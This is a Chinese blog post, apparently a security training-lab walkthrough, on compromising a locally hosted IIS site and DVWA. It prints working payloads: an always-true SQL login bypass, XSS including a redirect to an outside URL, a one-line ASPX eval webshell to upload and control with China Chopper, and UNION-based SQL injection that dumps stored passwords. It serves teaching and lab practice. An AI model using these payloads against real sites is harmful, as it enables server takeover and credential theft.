利用Web漏洞入侵网站并控制服务器&&Web漏洞原理与利用

于 2024-04-15 22:01:17 发布
阅读量861 收藏 17
点赞数 19
文章标签: 服务器 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_72661106/article/details/137797088
版权

实训目的

深入理解网络无安全的思想。

了解局域网查看软件Lansee的使用方法。

了解端口扫描软件AdvancedPortScanner的使用方法。

了解Web后台扫描软件御剑的使用方法。

了解网站漏洞扫描工具AWVS的使用方法。

了解Webshell连接工具中国菜刀的使用方法。

掌握端口及漏洞扫描的基本知识,能够利用工具进行扫描工作。

掌握网站入侵的一般流程。

实训准备及注意事项

1.硬件:装有Windows操作系统的计算机1台(关闭防火墙和杀毒软件),接入某局域网。

2.软件:LanSee、AdvancedPortScanner、御剑后台扫描工具、网站漏洞扫描工具AWVS、中国菜刀。

3.严格按照实验步骤进行实验,实验结果以截图的形式进行保留。

4.实验后务必将相关工具软件从机器彻底删除,避免工具被恶意利用影响网络正常使用。

实训准备 在windows上部署一个IIS web服务

安装IIS相关环境并利用IIS服务器发布靶站源代码(注意应用程序池使用.net 4.0并开启.NET服务

注意:如果.net环境安装不全可在CMD下输入:

"%WINDIR%\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" -iru -enable

如使用64位的windows系统需要应用程序池设置32位应用程序为true。

漏洞利用

网站后台绕过

1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。

2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。

3、输入一些特殊字符,如‘’/+-=等,点击登录,观察系统反馈。

4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。

5、进入网站后台管理界面。

篡改页面内容

1、在网站前台或后台中寻找能够提交信息的合适位置。

2、提交代码<script>alert("test")</script>,使用另外的主机访问此网站,观察效果。

3、提交代码(代码中的网址可更改):

<script>window.location.href="http://d.mytanwan.com"</script>,观察效果。

上传后门程序(木马)并控制目标主机

一句话木马的使用

1、新建文本文档,将文件后缀修改为aspx,书写内容如下:

<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

2、在系统中寻找文件上传点。

3、上传之前创建的aspx一句话木马文件。

4、设法获得上传文件在网站目录中的文件名称和路径。

5、利用中国菜刀工具连接一句话木马(密码为pass)。

6、获得目标服务器的操作权限并拿到数据库文件。

7、对数据库中的账号密码进行解密。

DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

DVWA共有十个模块,分别是:

1.Brute Force(密码破解)

2.Command Injection(命令行注入)

3.CSRF(跨站请求伪造)

4.File Inclusion(文件包含)

5.File Upload(文件上传)

6.Insecure CAPTCHA (不安全的验证码)

7.SQL Injection(SQL注入)

8.SQL Injection(Blind)(SQL盲注)

9.XSS(Reflected)(反射型跨站脚本)

10.XSS(Stored)(存储型跨站脚本)

SQL注入

1、打开SQL Injection界面,该界面的功能是通过输入User ID查询Username。

2、输入1提交,将正常返回查询结果。

3、输入1’提交,将返回一个错误。

4、猜测使用的sql语句可能是:select First name and Surname from 表名 where id='输入的id'。

5、输入1' union select 1,database()#提交,得到数据库名称。

6、输入1' union select 1,table_name from information_schema.tables where table_schema='dvwa'#,得到数据库中的表名。

7、输入1' union select 1,column_name from information_schema.columns where table_name='users'#,得到users表的列名。

8、输入1' union select 1,concat(user,password) from users#,得到users表的所有用户名和密码。

Diceee
关注
  • 19
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Web渗透入侵流程思路
2301_76161259的博客
03-27 691
什么是web渗透入侵呢?渗透测试能够独立地检查你的网络策略,换句话说,就是给你的系统安了一双眼睛。而且,进行这类测试的,都是寻找网络系统安全漏洞的专业人士。下面就来一起学习分享一下web入侵渗透流程中的思路,首先献出一张宝贵的图,这张图上写的就是入侵流程,比较不错,所以拿出来分享一下。咱们先总览一下整个流程。大家现在看到的这图左上部分,首先第一部分就是信息收集,有了信息才能开展下一步。首先要进行的就是信息收集,第一个必须要会用的就是whois。
web入侵讲解
weixin_46551178的博客
10-27 1221
大家好我是:Mr.唐 序言:浅谈网站入侵的常用方法和一般思路 首先介绍下什么样站点可以入侵 我认为必须是动态的网站 如ASP PHP JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的 14种可利用入侵方法 1.上传漏洞 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了! 有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMA...
WEB站点入侵常规方法
2301_76161259的博客
03-29 155
打个形象的比喻, 比如你和我一个楼 我家很安全,而你家呢 却漏洞百出 现在有个贼想入侵我家 他对我家做了监视(也就是扫描)发现没有什么可以利用的东西 那么这个贼发现你家和我家一个楼 你家很容易就进去了 他可以先进入你家 然后通过你家得到整个楼的钥匙(系统权限) 这样就自然得到我的钥匙了 就可以进入我的家(网站)我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改 COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
web服务器攻击的八种方式
2301_76161259的博客
03-29 3116
随着互联网的高速发展,网络走进了千家万户,同时也有很大一部分人架设起了自己的网站。继而不安分的黑客们,又将目光对准了服务器攻击这个方式,从而破坏或取得服务器的管理权限。本文将主要讲述针对web服务器攻击的八种方式。这种是ASP+ACCESS的网站入侵方式,通过注入点列出数据库里面管理员的帐号和密码信息,然后猜解出网站的后台地址,然后用帐号和密码登录进去找到文件上传的地方,把ASP木马上传上去,获得一个网站WEBSHELL,从而达到服务器攻击的目的。
常见的Web攻击手段,拿捏了!
Cbuc丶的博客
08-15 1129
大家好,我是小菜。 一个希望能够成为 吹着牛X谈架构 的男人!如果你也想成为我想成为的人,不然点个关注做个伴,让小菜不再孤单! 本文主要介绍 互联网中常见的 Web 攻击手段 如有需要,可以参考 如有帮助,不忘 点赞 ❥ 微信公众号已开启,小菜良记,没关注的同学们记得关注哦! 午饭期间,读者小李与我闲聊,谈到上周去面试的过程。经典的高开低走,面试初期答的还可以,但是到后面却不尽人意。其中有个面试问题引起了我的注意,面试官当时问小李:你知道有哪几种常见的 Web 攻击手段吗? Web 攻击手段?对于开发
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
一、文件上传漏洞原理 文件上传漏洞是由于 Web 应用程序没有正确地验证用户上传的文件类型和内容,导致攻击者可以上传恶意文件,例如木马文件、病毒文件等。这些恶意文件可以执行恶意代码,获取服务器控制权,...
计算机病毒与防护:文件上传漏洞原理.ppt
06-10
计算机病毒与防护:文件上传漏洞原理 文件上传漏洞是网络安全领域中的一个重要问题,尤其是在Web应用程序中,这种漏洞可能导致严重的安全威胁。许多网站提供文件上传功能,例如用户上传头像、社交网络上的照片分享...
网络安全原理与应用:windows命令执行漏洞演示.pptx
05-16
【网络安全原理与应用:Windows命令执行漏洞演示】 在网络安全领域,Web应用安全是至关重要的一环,而Windows命令执行漏洞则是其中常见的威胁之一。本演示主要针对Windows系统中的命令执行漏洞,通过DVWA(Damn ...
Web应用安全Web应用服务器.pptx
06-19
为了保护Web应用服务器,需要采取多种措施,如使用最新的安全更新,实施严格的访问控制策略,使用安全编码实践,以及利用防火墙、入侵检测系统等安全工具。 总的来说,Web应用服务器Web服务的核心,它们需要处理...
IIS短文件名漏洞利用工具
11-07
IIS短文件名漏洞利用工具就是针对这一漏洞设计的,它允许攻击者通过构造特殊的URL请求来触发漏洞,进而获取服务器控制权,或者执行任意代码。工具的一键利用特性意味着用户无需深入理解漏洞的底层原理,只需简单...
常见的Web攻击方式有哪些?黑客:28种总有一款适合你
最新发布
Karka_的博客
01-06 965
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
网站入侵常用方法集合
积木网络
02-09 1533
一:注入类:access数据库首先猜解管理员密码:手工猜解(当然,如果你有基础,这里就很简单。如果没学过,其实只要记下一些常用的语句就可以了。)工具猜解。我建议用zwell的穿山甲,也就是pangolin..或者是NBSI。前者猜解速度非常强悍。而猜解的准确率两者都很好。找出后台:用明小子,啊D,等工具都可以找的。但有时候会找不到。为什么呢?建议用多线程后台扫描工具。里
web网络安全——网站入侵(二)
lv小笨鸟要先飞啦
12-21 8725
成功例子分析(主要介绍非技术渗透步骤):某学院(难度很小的一类学校) http://XX.XX.XX.XX/ 1) 查看网站框架:chrome F12抓包分析:根据抓包Header中会有一部分网站信息, 网站框架:VWebServer/6.0.0 Apache Tomcat/6.0.29 6.0.43(后续查看网页源代码,报错页面显示信息) 2) 查看网页源代码: 注释:Cust
针对Web服务器的八种入侵攻击方式
o℃的浪漫屋
07-03 728
一、WEB服务器面临威胁 在了解WEB服务器安全状况之前,首先要让大家了解网站安全的另一面——黑客攻击。97至98年互联网开始在中国兴起之时,黑客就已经诞生了,在98年印尼排华事件中,中国黑客对印尼ZF网站的打击行动通过媒体的渲染,让黑客一词进入了广大中国网民的眼帘。随着几次黑客大战的爆发以及媒体对黑客的渲染,让更多人加入了黑客这个队伍。那么黑客都是通过怎样的技术手段实施攻击的呢?97年到200
< 今日份知识点:web常见的攻击方式(网络攻击)有哪些?如何预防?如何防御呢 ? >
一个平平无奇的技术宅
05-17 2360
近年来,网络攻击事件频发,互联网上的木马、蠕虫、勒索病毒软件层出不穷,这对网络安全乃至国家安全形成了严重的威胁。2017年`维基解密`公布了美国中情局和美国国家安全局的新型网络攻击工具,其中包括了大量的远程攻击工具、漏洞、网络攻击平台以及相关攻击说明的文档。同时从部分博客、论坛和开源网站,普通的用户就可以轻松的获得不同种类的网络攻击工具。互联网的公开性,让网络攻击者的攻击成本大大降低。 在互联网发达 且 互联网法律制裁并不完善的今天,面对来自网络上五花八门的攻击,我们该如何预防 ? 又该如何防御呢? 接下
WEB入侵的全过程(转载)
孔子说
07-13 2924
很偶然的一个机会,看到了一个网站,页面清新,很舒服的感觉。网站是用JSP开发的,由于个人爱好,所以我决定看看系统的安全性。 telnet www.target.com 8080 GET /CHINANSL HTTP/1.1 [Enter] [Enter] 返回的结果如下: HTTP/1.0 404 Not Found Date: Su
web网络安全——网站入侵(一)
热门推荐
lv小笨鸟要先飞啦
12-18 1万+
前言:哈哈哈,Mark,硕士入学以来第一个渗透成功的网站,成功脱裤。都说研究生生活苦,确实是,从接到入侵网站入侵成功整整半个月,纯属运气,首先网站很low,其次本人运气好,废话不多说,直接上过程。 入侵一般步骤  查询网站入侵记录 查询途径:https://www.hac-ker.net/search.php?var=Heihu&page=3 https://www.se
web安全-网站入侵
Coisini的博客
05-27 703
网站与应用安全评估:测试Web安全
6. **Web应用防火墙与入侵检测系统**:介绍如何使用WAF和IDS来增强Web应用的防护,以及它们的工作机制和配置策略。 7. **安全配置与管理**:讨论服务器和应用的配置最佳实践,如操作系统加固、软件更新管理和日志...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值